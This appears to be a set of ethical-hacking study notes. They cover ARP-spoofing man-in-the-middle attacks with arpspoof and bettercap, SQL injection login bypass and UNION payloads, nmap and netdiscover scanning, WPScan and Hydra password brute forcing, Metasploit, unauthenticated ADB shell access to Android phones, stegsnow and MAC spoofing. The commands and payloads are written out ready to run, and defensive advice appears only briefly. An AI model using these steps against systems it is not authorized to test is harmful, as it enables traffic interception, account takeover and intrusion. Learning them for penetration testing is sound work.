Man In The Middle (MITM)

In the man in the middle attack the attacker will put himself in the middle of the communication between the victim and the other device, that could be a proxy, another server, and so on, intercept and see anything that is being transferred between the two devices.

One of the working method to achieve the MITM attack is through the ARP spoofing.

ARP spoofing

ARP stands for Address Resolution Protocol.

The ARP spoofing consists in the redirecting all the packet traffic flow using the ARP protocol.

The ARP allows a device to exchange data with another device (normally a proxy) associating the device ip to the mac address using a matrix table (ARP table) in which all IPs are “converted” in a mac address. This ART table is saved in every device of the network, so every device of the network knows every couple “ip – mac address” of all devices of the network

The attacker, so, will replace, in the above table of the victim device, the mac address of the proxy with his own. In this way the victim wii think to exchange data with the proxy but in practice is going to exchange data with the hacker. Do you know the movie “face off”?…

To show this ARP table, open your cli and type (in whatever OS):

arp -a

the result is a list of match (<IP>) at <Mac address>

root@kali:~# arp -a
_gateway ( at e4:8f:34:37:ba:04 [ether] on eth0
Giuseppes-MBP.station ( at a4:83:e7:0b:37:38 [ether] on eth0
GiuseppBPGrande.station ( at 3c:22:fb:b8:8c:c6 [ether] on eth0

in our example the router is ( at e4:8f:34:37:ba:4 and the victim is ( at a4:83:e7:0b:37:38

The MITM will try to impersonate the router in the ART table of the victim.

To do so we can use arpspoof

With airspoof we need to modify two ARP tables. The one of the victim and the one of the gateway:

arpspoof -i <interface> -t <victimip> <gatewayip>

arpspoof -i <interface> -t <gatewayip> <victimip>

Now, we’re going to enable the IP forwarding. We do that so that when the packets flow through our device, they don’t get dropped so that each packet that goes through our device gets actually forwarded to its destination. So, when we get a packet from the client, it goes to the router, and when a packet comes from the router, it should go to the client without being dropped in our device. So, we’re going to enable it using this command:

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

The window device now thinks that the attacker device is the access point, and whenever the window device tries to communicate with the access point, it is going to send all these requests to the attacker device. This will place our attacker device in the middle of the connection, and we will be able to read all the packets, modify them, or drop them.


Another way to impersonate a device in the victim ARP table is the tool bettercap

how to use it:

bettercap -iface <networkinterface>

then you need to specify a module. In our case we need to enable net.probe module (to discover devices on the network) >  » net.probe on >  » [02:09:18] [sys.log] [inf] net.probe starting net.recon as a requirement for net.probe >  » [02:09:18] [sys.log] [inf] net.probe probing 256 addresses on >  » [02:09:18] [] endpoint detected as a4:83:e7:0b:37:38 (Apple, Inc.). >  » [02:09:18] [] endpoint detected as 3c:22:fb:b8:8c:c6 (Apple, Inc.). >  » [02:09:18] [] endpoint detected as 74:d4:23:c0:e4:88. >  » [02:09:18] [] endpoint detected as 80:0c:f9:a2:b0:5e. >  » [02:09:19] [] endpoint detected as 80:35:c1:52:d8:e3 (Xiaomi Communications Co Ltd). >  » [02:09:19] [] endpoint detected as d4:1b:81:15:b0:77 (Chongqing Fugui Electronics Co.,Ltd.). >  » [02:09:19] [] endpoint detected as 50:76:af:99:5b:3d (Intel Corporate). >  » [02:09:19] [] endpoint detected as b8:27:eb:26:8c:04 (Raspberry Pi Foundation). >  » [02:09:20] [] endpoint detected as 20:f4:78:1c:ed:dc (Xiaomi Communications Co Ltd). >  » [02:09:20] [] endpoint detected as dc:a6:32:d7:57:da (Raspberry Pi Trading Ltd). >  » [02:09:20] [] endpoint detected as 5a:92:d0:37:82:da. >  » [02:09:26] [] endpoint detected as 88:66:5a:3d:13:76 (Apple, Inc.). >  » [02:09:28] [] endpoint detected as 8e:c0:78:29:bd:34.

after that we can see all IPs and mac addresses type command

let’s spoof setting fullduplex true. This will allow to redirecting on both side (from/to the victim and from/to the gateway)

net.sniff on >  » set arp.spoof.fullduplex true >  » set <victimdeviceIP> >  » arp.spoof on

We are now in the middle of the connection.

To capture and analyse what is flowing in our system as MITM we can do >  » net.sniff on

Since this moment everything sent from the victim device will be shown on our screen.

Custom Spoofing script

To avoid every time to type every single command, it’s possible to create a script with all these commands together.

Create a text file (for instance spoofcommands.cap) with the list of all commands:

net.probe on
set arp.spoof.fullduplex true
set <victimdeviceIP>
arp.spoof on
net.sniff on

and type the following command:

bettercap -iface <networkinterface> -caplet spoofcommands.cap
SQL Injection

All websites that make interaction with a DB, use SQL.

But if the SQL script is not correctly written could be passible of some manipulation using the html form parameters, in which the attacker could put a malicious SQL code.

So to find a SQL Injection is very critical because it gives access to the entire DB as as admin.

How to discover SQL Injections

The easy way is to put in the html form input text some special SQL character like ‘ (single quote) ” (double quote) # (comment) and so on and see what happens.

We could get multiple result. An exception that could show the query which went wrong for instance.

Bypassing logins using SQL Injections

In a user/password login page we could set the username and in the password field we could specify the piece of query to continue the query of the login:

Let’s say that the query to login could be something like this:

select * from users where username='$username' and password='$password'

Where $username and $password are dynamically passed from the frontend.

Now, the login query could be hacked specifying a piece of sql as password.

For instance, the password field could be

password' and 1=1, in this way the query will be

select * from users where username='$username' and password='password' and 1=1

the worse sql injection could be:

$username = admin (or the whatever admin username)

$password = 123456′ or 1=1

In this case the query becomes:

select * from users where username='admin' and password='123456' or 1=1

Executing that query, assuming that admin is a real admin username, that query will always return true, even the password used is not correct, allowing us to enter as administrator.

Another way to use sql injection to try to bypass login is with comments just after the username, becasue whetever is written after comments is not used.

For instance a query like this:

select * from users where username = 'admin' #and password ='ciccio'

will return the user wich username is admin whatever could be the password.

In order to ahve a query like the above in the username we need to specify

$username = admin’ #

$password = whateverWeWant

The last query is the most interesting one because it allows us to have more complex query to gather more information from the database.

For instance we can add a union to get something else:

select * from users where username = 'admin' union select 1, database(), user(), version(), 5 #and password ='whateverWeWant'

In this case what we did was to use the following parameters:

$username = admin’ union select 1, database(), user(), version(), 5#

$password = whateverWeWant

Or, we can get DB information schema using another query after the union:

$username = admin’ union select 1, table_name, null, null, 5 from invormation_schemaa.tables#

$password = whateverWeWant

In this way you can get whatever you want from the DB, just putting an union query with the same column number of the first query (in our example is select * from users)

Discover SQL Injections

We can use

SQLMap cli tool to automate the sql injections using a specific url

OWASP ZAP, a UI tools very easy to use which find possibile SQL injections (but actually also other type of exploitations) on the entire website specifying also the field parameters to use 🙂

Prevent SQL Injection

To prevent sql injection on your sql scripts try to:

  • filter inputs
  • use parameterised statements!

Scanning and Enumeration

given the following IP, what are the IP running under this subnet?

netdiscover -r




To show open port:

nmap <one or more ip addresses or domain names separated by a space>

Scan a specific range



-v verbose details of the scan

-Pn to force the scan even if the ip looks down to the ping

-sA to detect firewall settings

-sL to identify hostname by completing a DNS query for each one

-iL <filename> to scan a list of IP inside a file

-sS to check, securely, for open ports without leaving traces on the target machine

-sU to scan for UDP port

-sn to perform a ping scan, so just to check if the host is up

-p <port list separated by space or port range separated by a dash> <ip or domain address> to specify the (list of) port that you want to scan

-A that stands for Aggressive. It’s the complete scan

-O will tell you the Operating System

-Pn in this case nmap will check the target considering that the host is alive, so even the host is not alive nmap will check this target (no ping scan)


Remote Desktop Protocol is a Windows service which normally runs on the 3389 port.

So to know which machine is running RDP use nmpa and look for 3389 port opened.

There has been a data breach in the x x y stockbroker office. There are 4 valid employees account registered in a machine ( which is used in the stockbroker office: ‘guest’, ‘ceh’, ‘administrator’, ‘john’. Find out who the hacker is

  • So, open RDP with the ip address (admin/aadmin123)
  • then type “net user” to check users registered in that particular windows machine.
  • Probably in the list of the users that will appear there will be an extra user who is the hacker

Hacking Web Application


wpscan --url <websitetocheck> -e u to check the list of username of a wordpress website

wpscan --url <websitetocheck> –usernames <filenameWithUserList> –passwords <filenameWithpasswordList>

wpscan --url <websitetocheck> -u <username> -P <filenameWithpasswordList>


  • msfconsole
  • search <serviceName>
  • use <metasploitServiceName>
  • info (or show option)
  • set <param>
  • run (or exploit)


Hydra is used to test the attacks using wordlists on different protocols (FTP, SSH, HTTPS, VNC, POP3, IMAP,….

hydra -l <username> -p <password> <ipserver> <service>

for instance

hydra -l root -p rootpass ssh

hydra -L user.txt -p rootpass ssh

hydra -L user.txt -P passlist.txt ssh

Hacking Android platform

Getting access to Android using ADB

et’s first check if that port is opened:

nmap <ipAddressOfAndroidDevice> -Pn

the result should be: PORT STATE SERVICE 5555/tcp open freeciv

we can try to connect using the following command:

adb connect <ipAddressOfAndroidDevice>:<port>


adb shell


To crypt

stegsnow -C -m "super secret message" -p "passwordtousetodecodemessage" originalfile.txt filewithhiddenmessage.txt

To decrypt

stegsnow -C -p "passwordtousetodecodemessage" filewithhiddenmessage.txt



Steganography is the practice of hiding a message inside of (or even on top of) something that is not secret.

The steganography has the double mission to hide and to deceive.

Of course not only messages can be hidden but also malware scripts.


There are a lot of tools that can hide things in images, files, and so on.

Snow is one of these.

Snow stands for Steganographic Nature Of Whitespace .

SNOW is a whitespace steganography tool that is used to embed hidden messages in ASCII format by extending the whitespace to the end of lines. This is done because the white spaces and tabs are not visible in text format to the viewers, thus making the messages hidden from the casual audience. The hidden messages are not available even if the built-in encryption is used to detect the message.

Snow is intended to be used with Windows. The Linux version is stegsnow.

To hide a message in a file (let’s say readme2.txt) using the content of an existing file (let’s say readme.txt):

stegsnow -C -m "super secret message" -p "passwordtousetodecodemessage" originalfile.txt filewithhiddenmessage.txt 

For instance

root@kali:~# stegsnow -C -m "CIAO MAMMA guarda come mi diverto" -p "magic" readme.txt readme2.txt 
Compressed by 30.30%
Message exceeded available space by approximately 776.19%.
An extra 6 lines were added.

where in readme.txt there is a generic content.

After the command the readme2.txt will contain the content of readme.txt plus soma extra spaces and tab.

To decode the content of readme2.txt:

stegsnow -C -p "passwordtousetodecodemessage" filewithhiddenmessage.txt 

For instance:

root@kali:~# stegsnow -C -p "magic" readme2.txt 
CIAO MAMMA guarda come mi diverto
Functional Attack to API providers

We could have few security attacks to an API:

  • SQL Injections
  • Fuzzing
  • Cross site forgery
  • Session/token hijacking

SQL Injections

In this attack, the attacker tries to identify input parameters used in a SQL statement in order to manipulate the original query


Fuzz test or Fuzzing is a black box software testing technic which consist to inject random data to a service in order to find bugs

A fuzzer would try combinations of attacks on:

  • numbers (signed/unsigned integers/float…)
  • chars (urls, command-line inputs)
  • metadata : user-input text (id3 tag)
  • pure binary sequences

A common approach to fuzzing is to define lists of “known-to-be-dangerous values” (fuzz vectors) for each type, and to inject them or recombinations.

  • for integers: zero, possibly negative or very big numbers
  • for chars: escaped, interpretable characters / instructions (ex: For SQL Requests, quotes / commands…)
  • for binary: random ones

The hacker, then, analyse the response to understand vulnerability

So pay attention to which type of response error you send back. Don’t send, for instance, sql exception error.

Cross site forgery

In this case the hacker is able to execute a script, which call our API, using the user device.

To avoid this type of attack use POST instead of GET, split transactions in multiple step, add custom headers.

Token and Sessions Hijacking

This is basically a specialisation of the Cross site forgery, with the target of get the token saved on the client device.

So, the user in some way executes the attacker script which will read the token or the session cookie and use it to access to private resources

In this case suggestions are:

expire your token

use complex token pattern

use some additional security header, do not rely only on Access Tokens

Getting access to Android using ADB

ADB stands for Android Debug Bridge and it is a CLI used to communicate with an Android device which is physically connected (through a USB cable for instance) to a computer.

Before continue, check if you have adb installed on your machine typing adb in the CLI. Normally, it is installed together with Android Studio. If it is not installed:

apt-get update
apt install adb

Normally this service is available at the 5555 port of the Android device.

Let’s first check if that port is opened:

nmap <ipAddressOfAndroidDevice> -Pn
root@kali:~# nmap -Pn
Starting Nmap 7.92 ( ) at 2023-07-10 02:17 EDT
Nmap scan report for RedmiNote5-Redmi.station (
Host is up (0.030s latency).
Not shown: 999 closed tcp ports (reset)
5555/tcp open  freeciv
MAC Address: 80:35:C1:52:D8:E3 (Xiaomi Communications)

Nmap done: 1 IP address (1 host up) scanned in 3.91 seconds

If it is not opened try to restart the usb port:

adb usb
adb tcpip 5555

Once it is opened we can try to connect using the following command:

adb connect <ipAddressOfAndroidDevice>:<port>

Normally the port is 5555 and it is optional

root@kali:~# adb connect
connected to

After a succesful connection type:

adb shell

Then, the result should be:

root@kali:~# adb shell
whyred:/ $

From this moment you can access to the Android device like you do in a normal Linux environment


Metasploit Framework is a cybersecurity project that provides info about vulnerability, simplifies penetration tests and helps in the development of intrusions systems check.

It is an open source tool and basically executes exploits to a remote machine.

Let’s start

First of all we need to check if our Metasploit is correctly connected to Metasploit db. Type the following:


The result would be something like that:

root@kali:~# msfconsole 
  |  METASPLOIT by Rapid7                                 |
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |

       =[ metasploit v6.2.18-dev                          ]
+ -- --=[ 2244 exploits - 1185 auxiliary - 398 post       ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Adapter names can be used for IP params 
set LHOST eth0

msf6 > 

from Metasploit command line (msf6> in our case) it’s possible execute normally nmap

How to use Metasploit

We need toe execute 3 step:

find the service we need (ftp, ssh, …). Type:

search <serviceYouNeed> (let's say: search ftp)

After chosen your service, we search deeply the correct service to use:

info scanner/ftp/

Then, if we need to know which version of ftp my target is using, we should call the service using the “use” command:

use auxiliary/scanner/ftp/ftp_version
msf6 > use auxiliary/scanner/ftp/ftp_version
msf6 auxiliary(scanner/ftp/ftp_version) >

and so, to know the interface of the service, we type:

info (or: show option)

The result shows the list of the params of that service:

msf6 auxiliary(scanner/ftp/ftp_version) > info

       Name: FTP Version Scanner
     Module: auxiliary/scanner/ftp/ftp_version
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  hdm <>

Check supported:

Basic options:
  Name     Current Setting      Required  Description
  ----     ---------------      --------  -----------
  FTPPASS  no        The password for the specified username
  FTPUSER  anonymous            no        The username to authenticate as
  RHOSTS                        yes       The target host(s), see
  RPORT    21                   yes       The target port (TCP)
  THREADS  1                    yes       The number of concurrent threads (max one per host)

  Detect FTP Version.

The required and not required aprams are show. Also the required ones, could have a default value so in tath case it’s not amdatory set that param.

To set a param we use “set” command:

msf6 auxiliary(scanner/ftp/ftp_version) > set RHOSTS
msf6 auxiliary(scanner/ftp/ftp_version) > 

To execute the service type the “run” command (or the “exploit” command):

msf6 auxiliary(scanner/ftp/ftp_version) > run

and this is the result:

[+]      - FTP Banner: '220 ProFTPD Server (Debian) [::ffff:]\x0d\x0a'
[*]      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ftp/ftp_version) > 

To recap, the (minimum) ordered list of the command to execute a service in Metasploit are:

  • msfconsole
  • search <serviceName>
  • use <metasploitServiceName>
  • info (or show option)
  • set <param>
  • run (or exploit)
WP Scan

WPScan is a tool designed to test the security of a WordPress web site.

To use it, simply type:

wpscan --url <websitetocheck>

Adding -e u parameter it will try to find also users

wpscan --url <websitetocheck> -e u

It’s possible to use also brute force to guess users and password using –usernames <filenameWithUserList> –passwords <filenameWithpasswordList>

If you already know the username: -u <username> -P <filenameWithpasswordList>

NMAP, discover devices on the (same) network

There are different tools that can discover devices connected on the same network.

The simpler one is netdiscover.

Let’s check our subnet before. Type, so


to discover our ip address and so our subnet

let’s say that our ipaddress is

Our subnet is 192.168.1 so all the other device connected on the same subnet are in the following range <== it means from to

To discover all the other devices connected to the same subnet using netdiscover, type:

netdiscover -r

The result will show you the list of all devices connected:

Currently scanning: Finished! | Screen View: Unique Hosts
33 Captured ARP Req/Rep packets, from 12 hosts. Total size: 2094

IP At MAC Address Count Len MAC Vendor / Hostname e4:8f:34:37:ba:04 20 1200 Vodafone Italia S.p.A. 3c:22:fb:b8:8c:c6 1 60 Apple, Inc. 5a:92:d0:37:82:da 1 60 Unknown vendor c8:6c:3d:96:65:96 1 174 Amazon Technologies Inc. 74:d4:23:c0:e4:88 2 120 Unknown vendor 7c:8b:ca:1b:d8:31 1 60 TP-LINK TECHNOLOGIES CO.,LTD. 20:f4:78:1c:ed:dc 1 60 Xiaomi Communications Co Ltd 7c:8b:ca:1b:d8:31 1 60 TP-LINK TECHNOLOGIES CO.,LTD. 80:35:c1:52:d8:e3 1 60 Xiaomi Communications Co Ltd 38:1f:8d:ed:70:d2 1 60 Tuya Smart Inc. 80:0c:f9:a2:b0:5e 1 60 Amazon Technologies Inc. b8:27:eb:26:8c:04 2 120 Raspberry Pi Foundation

The netdiscover tool can show ipaddress, mac address and the vendor of the device.

A most powerfull tool is nmap

nmap stands for Network MAPping, and is a tool, like netdiscover, that can find devices in your network but will show more information than netdiscover, like open port, services, OS version, …

The visual interface tool for nmap is Zenmap

With Zenmap you can choose graphically which comman on nmap to use.

With Zenmap you can choose different type of scan, for instance, and it basically translate your choose in a nmap command.

For instance, if you choose a °quick scan plus° choise it will execute the command

nmap -sV -T4 -O -F --version-light

with nmap you can scan a single website or multiple as well, to check port and services exposed

for instance to check google open port and service you can type


Detect firewall

sudo nmap -sA <ipadress>

To identify Hostnames  

sudo nmap -sL <ipadress>

We use “sL” option to find hostnames for the given host by completing a DNS query for each one.

MAC Address

MAC stands for Media Access Control.

It is a Permanent, Physical, Unique (in the world) “code” assigned to a physical object that allows to connect to a network. This code is the address assigned by the device manufacture.

This address never changes. It will be always the same.

The mac address is used to identify devices on the network.

So every packet that is sent in the network has a source MAC address and a destination MAC address.

Why to change MAC address

  • Because of above, changing your MAC address will make you anonymous in the network,
  • If there is a filter in the network configuration you can bypass it
  • You can “impersonate” another device changing you MAC with the one you want to impersonate,

How to change the MAC address

first of all let check which network interface we have. Let’s execute the following commanf:


The result will contain all your network interfaces.

The MAC address is the code just after the ether label, and it is in the form like xx:xx:xx:xx:xx:xx

In order to change it first we must disabled that interface, with the following command:

ifconfig <interfacename> down

Then we change the MAC address specifying that we want to change the hardware address “hw ether

ifconfig <interfacename> hw ether 00:11:22:33:44:55

Finally we eneble the network interface

ifconfig <interfacename> up

The original MAC address is back once the device is restarted